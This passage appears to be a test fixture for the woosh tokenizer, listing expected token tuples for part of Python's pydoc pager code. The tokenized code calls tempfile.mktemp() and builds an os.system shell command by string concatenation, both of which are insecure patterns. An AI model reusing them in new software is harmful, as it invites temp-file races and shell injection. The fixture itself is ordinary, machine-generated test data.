woosh.Token(woosh.INDENT, ' ', 1615, 0, 1615, 12),
woosh.Token(woosh.NAME, 'pass', 1615, 12, 1615, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1615, 16, 1616, 0),
woosh.Token(woosh.DEDENT, '', 1617, 0, 1617, 0),
woosh.Token(woosh.DEDENT, '', 1617, 0, 1617, 0),
woosh.Token(woosh.DEDENT, '', 1617, 0, 1617, 0),
woosh.Token(woosh.NAME, 'def', 1617, 0, 1617, 3),
woosh.Token(woosh.NAME, 'tempfilepager', 1617, 4, 1617, 17),
woosh.Token(woosh.OP, '(', 1617, 17, 1617, 18),
woosh.Token(woosh.NAME, 'text', 1617, 18, 1617, 22),
woosh.Token(woosh.OP, ',', 1617, 22, 1617, 23),
woosh.Token(woosh.NAME, 'cmd', 1617, 24, 1617, 27),
woosh.Token(woosh.OP, ')', 1617, 27, 1617, 28),
woosh.Token(woosh.OP, ':', 1617, 28, 1617, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1617, 29, 1618, 0),
woosh.Token(woosh.INDENT, ' ', 1618, 0, 1618, 4),
woosh.Token(woosh.STRING, '"""Page through text by invoking a program on a temporary file."""', 1618, 4, 1618, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1618, 70, 1619, 0),
woosh.Token(woosh.NAME, 'import', 1619, 4, 1619, 10),
woosh.Token(woosh.NAME, 'tempfile', 1619, 11, 1619, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1619, 19, 1620, 0),
woosh.Token(woosh.NAME, 'filename', 1620, 4, 1620, 12),
woosh.Token(woosh.OP, '=', 1620, 13, 1620, 14),
woosh.Token(woosh.NAME, 'tempfile', 1620, 15, 1620, 23),
woosh.Token(woosh.OP, '.', 1620, 23, 1620, 24),
woosh.Token(woosh.NAME, 'mktemp', 1620, 24, 1620, 30),
woosh.Token(woosh.OP, '(', 1620, 30, 1620, 31),
woosh.Token(woosh.OP, ')', 1620, 31, 1620, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1620, 32, 1621, 0),
woosh.Token(woosh.NAME, 'with', 1621, 4, 1621, 8),
woosh.Token(woosh.NAME, 'open', 1621, 9, 1621, 13),
woosh.Token(woosh.OP, '(', 1621, 13, 1621, 14),
woosh.Token(woosh.NAME, 'filename', 1621, 14, 1621, 22),
woosh.Token(woosh.OP, ',', 1621, 22, 1621, 23),
woosh.Token(woosh.STRING, "'w'", 1621, 24, 1621, 27),
woosh.Token(woosh.OP, ',', 1621, 27, 1621, 28),
woosh.Token(woosh.NAME, 'errors', 1621, 29, 1621, 35),
woosh.Token(woosh.OP, '=', 1621, 35, 1621, 36),
woosh.Token(woosh.STRING, "'backslashreplace'", 1621, 36, 1621, 54),
woosh.Token(woosh.OP, ')', 1621, 54, 1621, 55),
woosh.Token(woosh.NAME, 'as', 1621, 56, 1621, 58),
woosh.Token(woosh.NAME, 'file', 1621, 59, 1621, 63),
woosh.Token(woosh.OP, ':', 1621, 63, 1621, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1621, 64, 1622, 0),
woosh.Token(woosh.INDENT, ' ', 1622, 0, 1622, 8),
woosh.Token(woosh.NAME, 'file', 1622, 8, 1622, 12),
woosh.Token(woosh.OP, '.', 1622, 12, 1622, 13),
woosh.Token(woosh.NAME, 'write', 1622, 13, 1622, 18),
woosh.Token(woosh.OP, '(', 1622, 18, 1622, 19),
woosh.Token(woosh.NAME, 'text', 1622, 19, 1622, 23),
woosh.Token(woosh.OP, ')', 1622, 23, 1622, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1622, 24, 1623, 0),
woosh.Token(woosh.DEDENT, ' ', 1623, 0, 1623, 4),
woosh.Token(woosh.NAME, 'try', 1623, 4, 1623, 7),
woosh.Token(woosh.OP, ':', 1623, 7, 1623, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1623, 8, 1624, 0),
woosh.Token(woosh.INDENT, ' ', 1624, 0, 1624, 8),
woosh.Token(woosh.NAME, 'os', 1624, 8, 1624, 10),
woosh.Token(woosh.OP, '.', 1624, 10, 1624, 11),
woosh.Token(woosh.NAME, 'system', 1624, 11, 1624, 17),
woosh.Token(woosh.OP, '(', 1624, 17, 1624, 18),
woosh.Token(woosh.NAME, 'cmd', 1624, 18, 1624, 21),
woosh.Token(woosh.OP, '+', 1624, 22, 1624, 23),
woosh.Token(woosh.STRING, '\' "\'', 1624, 24, 1624, 28),
woosh.Token(woosh.OP, '+', 1624, 29, 1624, 30),
woosh.Token(woosh.NAME, 'filename', 1624, 31, 1624, 39),
woosh.Token(woosh.OP, '+', 1624, 40, 1624, 41),
woosh.Token(woosh.STRING, '\'"\'', 1624, 42, 1624, 45),
woosh.Token(woosh.OP, ')', 1624, 45, 1624, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1624, 46, 1625, 0),
woosh.Token(woosh.DEDENT, ' ', 1625, 0, 1625, 4),
woosh.Token(woosh.NAME, 'finally', 1625, 4, 1625, 11),
woosh.Token(woosh.OP, ':', 1625, 11, 1625, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1625, 12, 1626, 0),
woosh.Token(woosh.INDENT, ' ', 1626, 0, 1626, 8),
woosh.Token(woosh.NAME, 'os', 1626, 8, 1626, 10),
woosh.Token(woosh.OP, '.', 1626, 10, 1626, 11),
woosh.Token(woosh.NAME, 'unlink', 1626, 11, 1626, 17),
woosh.Token(woosh.OP, '(', 1626, 17, 1626, 18),
woosh.Token(woosh.NAME, 'filename', 1626, 18, 1626, 26),
woosh.Token(woosh.OP, ')', 1626, 26, 1626, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1626, 27, 1627, 0),
woosh.Token(woosh.DEDENT, '', 1628, 0, 1628, 0),
woosh.Token(woosh.DEDENT, '', 1628, 0, 1628, 0),
woosh.Token(woosh.NAME, 'def', 1628, 0, 1628, 3),
woosh.Token(woosh.NAME, '_escape_stdout', 1628, 4, 1628, 18),
woosh.Token(woosh.OP, '(', 1628, 18, 1628, 19),
woosh.Token(woosh.NAME, 'text', 1628, 19, 1628, 23),
woosh.Token(woosh.OP, ')', 1628, 23, 1628, 24),
woosh.Token(woosh.OP, ':', 1628, 24, 1628, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1628, 25, 1629, 0),
woosh.Token(woosh.COMMENT, '# Escape non-encodable characters to avoid encoding errors later', 1629, 4, 1629, 68),
woosh.Token(woosh.INDENT, ' ', 1630, 0, 1630, 4),
woosh.Token(woosh.NAME, 'encoding', 1630, 4, 1630, 12),
woosh.Token(woosh.OP, '=', 1630, 13, 1630, 14),
woosh.Token(woosh.NAME, 'getattr', 1630, 15, 1630, 22),
woosh.Token(woosh.OP, '(', 1630, 22, 1630, 23),
woosh.Token(woosh.NAME, 'sys', 1630, 23, 1630, 26),
woosh.Token(woosh.OP, '.', 1630, 26, 1630, 27),
woosh.Token(woosh.NAME, 'stdout', 1630, 27, 1630, 33),
woosh.Token(woosh.OP, ',', 1630, 33, 1630, 34),
woosh.Token(woosh.STRING, "'encoding'", 1630, 35, 1630, 45),
woosh.Token(woosh.OP, ',', 1630, 45, 1630, 46),
woosh.Token(woosh.NAME, 'None', 1630, 47, 1630, 51),
woosh.Token(woosh.OP, ')', 1630, 51, 1630, 52),
woosh.Token(woosh.NAME, 'or', 1630, 53, 1630, 55),
woosh.Token(woosh.STRING, "'utf-8'", 1630, 56, 1630, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1630, 63, 1631, 0),
woosh.Token(woosh.NAME, 'return', 1631, 4, 1631, 10),
woosh.Token(woosh.NAME, 'text', 1631, 11, 1631, 15),
woosh.Token(woosh.OP, '.', 1631, 15, 1631, 16),
woosh.Token(woosh.NAME, 'encode', 1631, 16, 1631, 22),
woosh.Token(woosh.OP, '(', 1631, 22, 1631, 23),
woosh.Token(woosh.NAME, 'encoding', 1631, 23, 1631, 31),
woosh.Token(woosh.OP, ',', 1631, 31, 1631, 32),
woosh.Token(woosh.STRING, "'backslashreplace'", 1631, 33, 1631, 51),
woosh.Token(woosh.OP, ')', 1631, 51, 1631, 52),
woosh.Token(woosh.OP, '.', 1631, 52, 1631, 53),
woosh.Token(woosh.NAME, 'decode', 1631, 53, 1631, 59),
woosh.Token(woosh.OP, '(', 1631, 59, 1631, 60),
woosh.Token(woosh.NAME, 'encoding', 1631, 60, 1631, 68),
woosh.Token(woosh.OP, ')', 1631, 68, 1631, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1631, 69, 1632, 0),
woosh.Token(woosh.DEDENT, '', 1633, 0, 1633, 0),
woosh.Token(woosh.NAME, 'def', 1633, 0, 1633, 3),
woosh.Token(woosh.NAME, 'ttypager', 1633, 4, 1633, 12),
woosh.Token(woosh.OP, '(', 1633, 12, 1633, 13),
woosh.Token(woosh.NAME, 'text', 1633, 13, 1633, 17),
woosh.Token(woosh.OP, ')', 1633, 17, 1633, 18),
woosh.Token(woosh.OP, ':', 1633, 18, 1633, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1633, 19, 1634, 0),
woosh.Token(woosh.INDENT, ' ', 1634, 0, 1634, 4),
woosh.Token(woosh.STRING, '"""Page through text on a text terminal."""', 1634, 4, 1634, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1634, 47, 1635, 0),
woosh.Token(woosh.NAME, 'lines', 1635, 4, 1635, 9),
woosh.Token(woosh.OP, '=', 1635, 10, 1635, 11),
woosh.Token(woosh.NAME, 'plain', 1635, 12, 1635, 17),
woosh.Token(woosh.OP, '(', 1635, 17, 1635, 18),
woosh.Token(woosh.NAME, '_escape_stdout', 1635, 18, 1635, 32),
woosh.Token(woosh.OP, '(', 1635, 32, 1635, 33),
woosh.Token(woosh.NAME, 'text', 1635, 33, 1635, 37),
woosh.Token(woosh.OP, ')', 1635, 37, 1635, 38),
woosh.Token(woosh.OP, ')', 1635, 38, 1635, 39),
woosh.Token(woosh.OP, '.', 1635, 39, 1635, 40),
woosh.Token(woosh.NAME, 'split', 1635, 40, 1635, 45),
woosh.Token(woosh.OP, '(', 1635, 45, 1635, 46),
woosh.Token(woosh.STRING, "'\\n'", 1635, 46, 1635, 50),
woosh.Token(woosh.OP, ')', 1635, 50, 1635, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1635, 51, 1636, 0),
woosh.Token(woosh.NAME, 'try', 1636, 4, 1636, 7),
woosh.Token(woosh.OP, ':', 1636, 7, 1636, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1636, 8, 1637, 0),
woosh.Token(woosh.INDENT, ' ', 1637, 0, 1637, 8),
woosh.Token(woosh.NAME, 'import', 1637, 8, 1637, 14),
woosh.Token(woosh.NAME, 'tty', 1637, 15, 1637, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1637, 18, 1638, 0),
woosh.Token(woosh.NAME, 'fd', 1638, 8, 1638, 10),
woosh.Token(woosh.OP, '=', 1638, 11, 1638, 12),
woosh.Token(woosh.NAME, 'sys', 1638, 13, 1638, 16),
woosh.Token(woosh.OP, '.', 1638, 16, 1638, 17),
woosh.Token(woosh.NAME, 'stdin', 1638, 17, 1638, 22),
woosh.Token(woosh.OP, '.', 1638, 22, 1638, 23),
woosh.Token(woosh.NAME, 'fileno', 1638, 23, 1638, 29),
woosh.Token(woosh.OP, '(', 1638, 29, 1638, 30),
woosh.Token(woosh.OP, ')', 1638, 30, 1638, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1638, 31, 1639, 0),
woosh.Token(woosh.NAME, 'old', 1639, 8, 1639, 11),
woosh.Token(woosh.OP, '=', 1639, 12, 1639, 13),
woosh.Token(woosh.NAME, 'tty', 1639, 14, 1639, 17),
woosh.Token(woosh.OP, '.', 1639, 17, 1639, 18),
woosh.Token(woosh.NAME, 'tcgetattr', 1639, 18, 1639, 27),
woosh.Token(woosh.OP, '(', 1639, 27, 1639, 28),
woosh.Token(woosh.NAME, 'fd', 1639, 28, 1639, 30),
woosh.Token(woosh.OP, ')', 1639, 30, 1639, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1639, 31, 1640, 0),
woosh.Token(woosh.NAME, 'tty', 1640, 8, 1640, 11),
woosh.Token(woosh.OP, '.', 1640, 11, 1640, 12),
woosh.Token(woosh.NAME, 'setcbreak', 1640, 12, 1640, 21),
woosh.Token(woosh.OP, '(', 1640, 21, 1640, 22),
woosh.Token(woosh.NAME, 'fd', 1640, 22, 1640, 24),
woosh.Token(woosh.OP, ')', 1640, 24, 1640, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1640, 25, 1641, 0),
woosh.Token(woosh.NAME, 'getchar', 1641, 8, 1641, 15),
woosh.Token(woosh.OP, '=', 1641, 16, 1641, 17),
woosh.Token(woosh.NAME, 'lambda', 1641, 18, 1641, 24),
woosh.Token(woosh.OP, ':', 1641, 24, 1641, 25),
woosh.Token(woosh.NAME, 'sys', 1641, 26, 1641, 29),
woosh.Token(woosh.OP, '.', 1641, 29, 1641, 30),
woosh.Token(woosh.NAME, 'stdin', 1641, 30, 1641, 35),
woosh.Token(woosh.OP, '.', 1641, 35, 1641, 36),
woosh.Token(woosh.NAME, 'read', 1641, 36, 1641, 40),
woosh.Token(woosh.OP, '(', 1641, 40, 1641, 41),
woosh.Token(woosh.NUMBER, '1', 1641, 41, 1641, 42),
woosh.Token(woosh.OP, ')', 1641, 42, 1641, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1641, 43, 1642, 0),
woosh.Token(woosh.DEDENT, ' ', 1642, 0, 1642, 4),
woosh.Token(woosh.NAME, 'except', 1642, 4, 1642, 10),
woosh.Token(woosh.OP, '(', 1642, 11, 1642, 12),
woosh.Token(woosh.NAME, 'ImportError', 1642, 12, 1642, 23),
woosh.Token(woosh.OP, ',', 1642, 23, 1642, 24),
woosh.Token(woosh.NAME, 'AttributeError', 1642, 25, 1642, 39),
woosh.Token(woosh.OP, ',', 1642, 39, 1642, 40),
woosh.Token(woosh.NAME, 'io', 1642, 41, 1642, 43),
woosh.Token(woosh.OP, '.', 1642, 43, 1642, 44),
woosh.Token(woosh.NAME, 'UnsupportedOperation', 1642, 44, 1642, 64),
woosh.Token(woosh.OP, ')', 1642, 64, 1642, 65),
woosh.Token(woosh.OP, ':', 1642, 65, 1642, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1642, 66, 1643, 0),
woosh.Token(woosh.INDENT, ' ', 1643, 0, 1643, 8),
woosh.Token(woosh.NAME, 'tty', 1643, 8, 1643, 11),
woosh.Token(woosh.OP, '=', 1643, 12, 1643, 13),
woosh.Token(woosh.NAME, 'None', 1643, 14, 1643, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1643, 18, 1644, 0),
woosh.Token(woosh.NAME, 'getchar', 1644, 8, 1644, 15),
woosh.Token(woosh.OP, '=', 1644, 16, 1644, 17),
woosh.Token(woosh.NAME, 'lambda', 1644, 18, 1644, 24),
woosh.Token(woosh.OP, ':', 1644, 24, 1644, 25),
woosh.Token(woosh.NAME, 'sys', 1644, 26, 1644, 29),
woosh.Token(woosh.OP, '.', 1644, 29, 1644, 30),
woosh.Token(woosh.NAME, 'stdin', 1644, 30, 1644, 35),
woosh.Token(woosh.OP, '.', 1644, 35, 1644, 36),
woosh.Token(woosh.NAME, 'readline', 1644, 36, 1644, 44),
woosh.Token(woosh.OP, '(', 1644, 44, 1644, 45),
woosh.Token(woosh.OP, ')', 1644, 45, 1644, 46),
woosh.Token(woosh.OP, '[', 1644, 46, 1644, 47),
woosh.Token(woosh.OP, ':', 1644, 47, 1644, 48),
woosh.Token(woosh.OP, '-', 1644, 48, 1644, 49),
woosh.Token(woosh.NUMBER, '1', 1644, 49, 1644, 50),
woosh.Token(woosh.OP, ']', 1644, 50, 1644, 51),
woosh.Token(woosh.OP, '[', 1644, 51, 1644, 52),
woosh.Token(woosh.OP, ':', 1644, 52, 1644, 53),
woosh.Token(woosh.NUMBER, '1', 1644, 53, 1644, 54),
woosh.Token(woosh.OP, ']', 1644, 54, 1644, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1644, 55, 1645, 0),
woosh.Token(woosh.DEDENT, ' ', 1646, 0, 1646, 4),
woosh.Token(woosh.NAME, 'try', 1646, 4, 1646, 7),
woosh.Token(woosh.OP, ':', 1646, 7, 1646, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1646, 8, 1647, 0),
woosh.Token(woosh.INDENT, ' ', 1647, 0, 1647, 8),
woosh.Token(woosh.NAME, 'try', 1647, 8, 1647, 11),
woosh.Token(woosh.OP, ':', 1647, 11, 1647, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1647, 12, 1648, 0),
woosh.Token(woosh.INDENT, ' ', 1648, 0, 1648, 12),
woosh.Token(woosh.NAME, 'h', 1648, 12, 1648, 13),
woosh.Token(woosh.OP, '=', 1648, 14, 1648, 15),
woosh.Token(woosh.NAME, 'int', 1648, 16, 1648, 19),
woosh.Token(woosh.OP, '(', 1648, 19, 1648, 20),
woosh.Token(woosh.NAME, 'os', 1648, 20, 1648, 22),
woosh.Token(woosh.OP, '.', 1648, 22, 1648, 23),
woosh.Token(woosh.NAME, 'environ', 1648, 23, 1648, 30),
woosh.Token(woosh.OP, '.', 1648, 30, 1648, 31),
woosh.Token(woosh.NAME, 'get', 1648, 31, 1648, 34),
woosh.Token(woosh.OP, '(', 1648, 34, 1648, 35),
woosh.Token(woosh.STRING, "'LINES'", 1648, 35, 1648, 42),
woosh.Token(woosh.OP, ',', 1648, 42, 1648, 43),
woosh.Token(woosh.NUMBER, '0', 1648, 44, 1648, 45),
woosh.Token(woosh.OP, ')', 1648, 45, 1648, 46),
woosh.Token(woosh.OP, ')', 1648, 46, 1648, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1648, 47, 1649, 0),
woosh.Token(woosh.DEDENT, ' ', 1649, 0, 1649, 8),
woosh.Token(woosh.NAME, 'except', 1649, 8, 1649, 14),
woosh.Token(woosh.NAME, 'ValueError', 1649, 15, 1649, 25),
woosh.Token(woosh.OP, ':', 1649, 25, 1649, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1649, 26, 1650, 0),
woosh.Token(woosh.INDENT, ' ', 1650, 0, 1650, 12),
woosh.Token(woosh.NAME, 'h', 1650, 12, 1650, 13),
woosh.Token(woosh.OP, '=', 1650, 14, 1650, 15),
woosh.Token(woosh.NUMBER, '0', 1650, 16, 1650, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1650, 17, 1651, 0),
woosh.Token(woosh.DEDENT, ' ', 1651, 0, 1651, 8),
woosh.Token(woosh.NAME, 'if', 1651, 8, 1651, 10),
woosh.Token(woosh.NAME, 'h', 1651, 11, 1651, 12),
woosh.Token(woosh.OP, '<=', 1651, 13, 1651, 15),
woosh.Token(woosh.NUMBER, '1', 1651, 16, 1651, 17),
woosh.Token(woosh.OP, ':', 1651, 17, 1651, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1651, 18, 1652, 0),
woosh.Token(woosh.INDENT, ' ', 1652, 0, 1652, 12),
woosh.Token(woosh.NAME, 'h', 1652, 12, 1652, 13),
woosh.Token(woosh.OP, '=', 1652, 14, 1652, 15),
woosh.Token(woosh.NUMBER, '25', 1652, 16, 1652, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1652, 18, 1653, 0),
woosh.Token(woosh.DEDENT, ' ', 1653, 0, 1653, 8),
woosh.Token(woosh.NAME, 'r', 1653, 8, 1653, 9),
woosh.Token(woosh.OP, '=', 1653, 10, 1653, 11),
woosh.Token(woosh.NAME, 'inc', 1653, 12, 1653, 15),
woosh.Token(woosh.OP, '=', 1653, 16, 1653, 17),
woosh.Token(woosh.NAME, 'h', 1653, 18, 1653, 19),
woosh.Token(woosh.OP, '-', 1653, 20, 1653, 21),
woosh.Token(woosh.NUMBER, '1', 1653, 22, 1653, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1653, 23, 1654, 0),
woosh.Token(woosh.NAME, 'sys', 1654, 8, 1654, 11),
woosh.Token(woosh.OP, '.', 1654, 11, 1654, 12),
woosh.Token(woosh.NAME, 'stdout', 1654, 12, 1654, 18),
woosh.Token(woosh.OP, '.', 1654, 18, 1654, 19),
woosh.Token(woosh.NAME, 'write', 1654, 19, 1654, 24),
woosh.Token(woosh.OP, '(', 1654, 24, 1654, 25),
woosh.Token(woosh.STRING, "'\\n'", 1654, 25, 1654, 29),
woosh.Token(woosh.OP, '.', 1654, 29, 1654, 30),
woosh.Token(woosh.NAME, 'join', 1654, 30, 1654, 34),
woosh.Token(woosh.OP, '(', 1654, 34, 1654, 35),
woosh.Token(woosh.NAME, 'lines', 1654, 35, 1654, 40),
woosh.Token(woosh.OP, '[', 1654, 40, 1654, 41),
woosh.Token(woosh.OP, ':', 1654, 41, 1654, 42),
woosh.Token(woosh.NAME, 'inc', 1654, 42, 1654, 45),
woosh.Token(woosh.OP, ']', 1654, 45, 1654, 46),
woosh.Token(woosh.OP, ')', 1654, 46, 1654, 47),
woosh.Token(woosh.OP, '+', 1654, 48, 1654, 49),
woosh.Token(woosh.STRING, "'\\n'", 1654, 50, 1654, 54),
woosh.Token(woosh.OP, ')', 1654, 54, 1654, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1654, 55, 1655, 0),
woosh.Token(woosh.NAME, 'while', 1655, 8, 1655, 13),
woosh.Token(woosh.NAME, 'lines', 1655, 14, 1655, 19),
woosh.Token(woosh.OP, '[', 1655, 19, 1655, 20),
woosh.Token(woosh.NAME, 'r', 1655, 20, 1655, 21),
woosh.Token(woosh.OP, ':', 1655, 21, 1655, 22),
woosh.Token(woosh.OP, ']', 1655, 22, 1655, 23),
woosh.Token(woosh.OP, ':', 1655, 23, 1655, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1655, 24, 1656, 0),
woosh.Token(woosh.INDENT, ' ', 1656, 0, 1656, 12),
woosh.Token(woosh.NAME, 'sys', 1656, 12, 1656, 15),
woosh.Token(woosh.OP, '.', 1656, 15, 1656, 16),
woosh.Token(woosh.NAME, 'stdout', 1656, 16, 1656, 22),
woosh.Token(woosh.OP, '.', 1656, 22, 1656, 23),
woosh.Token(woosh.NAME, 'write', 1656, 23, 1656, 28),
woosh.Token(woosh.OP, '(', 1656, 28, 1656, 29),
woosh.Token(woosh.STRING, "'-- more --'", 1656, 29, 1656, 41),
woosh.Token(woosh.OP, ')', 1656, 41, 1656, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1656, 42, 1657, 0),
woosh.Token(woosh.NAME, 'sys', 1657, 12, 1657, 15),
woosh.Token(woosh.OP, '.', 1657, 15, 1657, 16),
woosh.Token(woosh.NAME, 'stdout', 1657, 16, 1657, 22),
woosh.Token(woosh.OP, '.', 1657, 22, 1657, 23),
woosh.Token(woosh.NAME, 'flush', 1657, 23, 1657, 28),
woosh.Token(woosh.OP, '(', 1657, 28, 1657, 29),
woosh.Token(woosh.OP, ')', 1657, 29, 1657, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1657, 30, 1658, 0),
woosh.Token(woosh.NAME, 'c', 1658, 12, 1658, 13),
woosh.Token(woosh.OP, '=', 1658, 14, 1658, 15),
woosh.Token(woosh.NAME, 'getchar', 1658, 16, 1658, 23),
woosh.Token(woosh.OP, '(', 1658, 23, 1658, 24),
woosh.Token(woosh.OP, ')', 1658, 24, 1658, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1658, 25, 1659, 0),
woosh.Token(woosh.NAME, 'if', 1660, 12, 1660, 14),
woosh.Token(woosh.NAME, 'c', 1660, 15, 1660, 16),
woosh.Token(woosh.NAME, 'in', 1660, 17, 1660, 19),
woosh.Token(woosh.OP, '(', 1660, 20, 1660, 21),
woosh.Token(woosh.STRING, "'q'", 1660, 21, 1660, 24),
woosh.Token(woosh.OP, ',', 1660, 24, 1660, 25),
woosh.Token(woosh.STRING, "'Q'", 1660, 26, 1660, 29),
woosh.Token(woosh.OP, ')', 1660, 29, 1660, 30),
woosh.Token(woosh.OP, ':', 1660, 30, 1660, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1660, 31, 1661, 0),
woosh.Token(woosh.INDENT, ' ', 1661, 0, 1661, 16),
woosh.Token(woosh.NAME, 'sys', 1661, 16, 1661, 19),
woosh.Token(woosh.OP, '.', 1661, 19, 1661, 20),
woosh.Token(woosh.NAME, 'stdout', 1661, 20, 1661, 26),
woosh.Token(woosh.OP, '.', 1661, 26, 1661, 27),
woosh.Token(woosh.NAME, 'write', 1661, 27, 1661, 32),
woosh.Token(woosh.OP, '(', 1661, 32, 1661, 33),
woosh.Token(woosh.STRING, "'\\r \\r'", 1661, 33, 1661, 49),
woosh.Token(woosh.OP, ')', 1661, 49, 1661, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1661, 50, 1662, 0),
woosh.Token(woosh.NAME, 'break', 1662, 16, 1662, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1662, 21, 1663, 0),
woosh.Token(woosh.DEDENT, ' ', 1663, 0, 1663, 12),
woosh.Token(woosh.NAME, 'elif', 1663, 12, 1663, 16),
woosh.Token(woosh.NAME, 'c', 1663, 17, 1663, 18),
woosh.Token(woosh.NAME, 'in', 1663, 19, 1663, 21),
woosh.Token(woosh.OP, '(', 1663, 22, 1663, 23),
woosh.Token(woosh.STRING, "'\\r'", 1663, 23, 1663, 27),
woosh.Token(woosh.OP, ',', 1663, 27, 1663, 28),
woosh.Token(woosh.STRING, "'\\n'", 1663, 29, 1663, 33),
woosh.Token(woosh.OP, ')', 1663, 33, 1663, 34),
woosh.Token(woosh.OP, ':', 1663, 34, 1663, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1663, 35, 1664, 0),
woosh.Token(woosh.INDENT, ' ', 1664, 0, 1664, 16),
woosh.Token(woosh.NAME, 'sys', 1664, 16, 1664, 19),
woosh.Token(woosh.OP, '.', 1664, 19, 1664, 20),
woosh.Token(woosh.NAME, 'stdout', 1664, 20, 1664, 26),
woosh.Token(woosh.OP, '.', 1664, 26, 1664, 27),
woosh.Token(woosh.NAME, 'write', 1664, 27, 1664, 32),
woosh.Token(woosh.OP, '(', 1664, 32, 1664, 33),
woosh.Token(woosh.STRING, "'\\r \\r'", 1664, 33, 1664, 49),
woosh.Token(woosh.OP, '+', 1664, 50, 1664, 51),
woosh.Token(woosh.NAME, 'lines', 1664, 52, 1664, 57),
woosh.Token(woosh.OP, '[', 1664, 57, 1664, 58),
woosh.Token(woosh.NAME, 'r', 1664, 58, 1664, 59),
woosh.Token(woosh.OP, ']', 1664, 59, 1664, 60),
woosh.Token(woosh.OP, '+', 1664, 61, 1664, 62),
woosh.Token(woosh.STRING, "'\\n'", 1664, 63, 1664, 67),
woosh.Token(woosh.OP, ')', 1664, 67, 1664, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 1664, 68, 1665, 0),
woosh.Token(woosh.NAME, 'r', 1665, 16, 1665, 17),
woosh.Token(woosh.OP, '=', 1665, 18, 1665, 19),
woosh.Token(woosh.NAME, 'r', 1665, 20, 1665, 21),
woosh.Token(woosh.OP, '+', 1665, 22, 1665, 23),
woosh.Token(woosh.NUMBER, '1', 1665, 24, 1665, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1665, 25, 1666, 0),
woosh.Token(woosh.NAME, 'continue', 1666, 16, 1666, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1666, 24, 1667, 0),
woosh.Token(woosh.DEDENT, ' ', 1667, 0, 1667, 12),
woosh.Token(woosh.NAME, 'if', 1667, 12, 1667, 14),
woosh.Token(woosh.NAME, 'c', 1667, 15, 1667, 16),
woosh.Token(woosh.NAME, 'in', 1667, 17, 1667, 19),
woosh.Token(woosh.OP, '(', 1667, 20, 1667, 21),
woosh.Token(woosh.STRING, "'b'", 1667, 21, 1667, 24),
woosh.Token(woosh.OP, ',', 1667, 24, 1667, 25),
woosh.Token(woosh.STRING, "'B'", 1667, 26, 1667, 29),
woosh.Token(woosh.OP, ',', 1667, 29, 1667, 30),
woosh.Token(woosh.STRING, "'\\x1b'", 1667, 31, 1667, 37),
woosh.Token(woosh.OP, ')', 1667, 37, 1667, 38),
woosh.Token(woosh.OP, ':', 1667, 38, 1667, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1667, 39, 1668, 0),
woosh.Token(woosh.INDENT, ' ', 1668, 0, 1668, 16),
woosh.Token(woosh.NAME, 'r', 1668, 16, 1668, 17),
woosh.Token(woosh.OP, '=', 1668, 18, 1668, 19),
woosh.Token(woosh.NAME, 'r', 1668, 20, 1668, 21),
woosh.Token(woosh.OP, '-', 1668, 22, 1668, 23),
woosh.Token(woosh.NAME, 'inc', 1668, 24, 1668, 27),
woosh.Token(woosh.OP, '-', 1668, 28, 1668, 29),
woosh.Token(woosh.NAME, 'inc', 1668, 30, 1668, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1668, 33, 1669, 0),
woosh.Token(woosh.NAME, 'if', 1669, 16, 1669, 18),
woosh.Token(woosh.NAME, 'r', 1669, 19, 1669, 20),
woosh.Token(woosh.OP, '<', 1669, 21, 1669, 22),
woosh.Token(woosh.NUMBER, '0', 1669, 23, 1669, 24),
woosh.Token(woosh.OP, ':', 1669, 24, 1669, 25),
woosh.Token(woosh.NAME, 'r', 1669, 26, 1669, 27),
woosh.Token(woosh.OP, '=', 1669, 28, 1669, 29),
woosh.Token(woosh.NUMBER, '0', 1669, 30, 1669, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1669, 31, 1670, 0),
woosh.Token(woosh.DEDENT, ' ', 1670, 0, 1670, 12),
woosh.Token(woosh.NAME, 'sys', 1670, 12, 1670, 15),
woosh.Token(woosh.OP, '.', 1670, 15, 1670, 16),
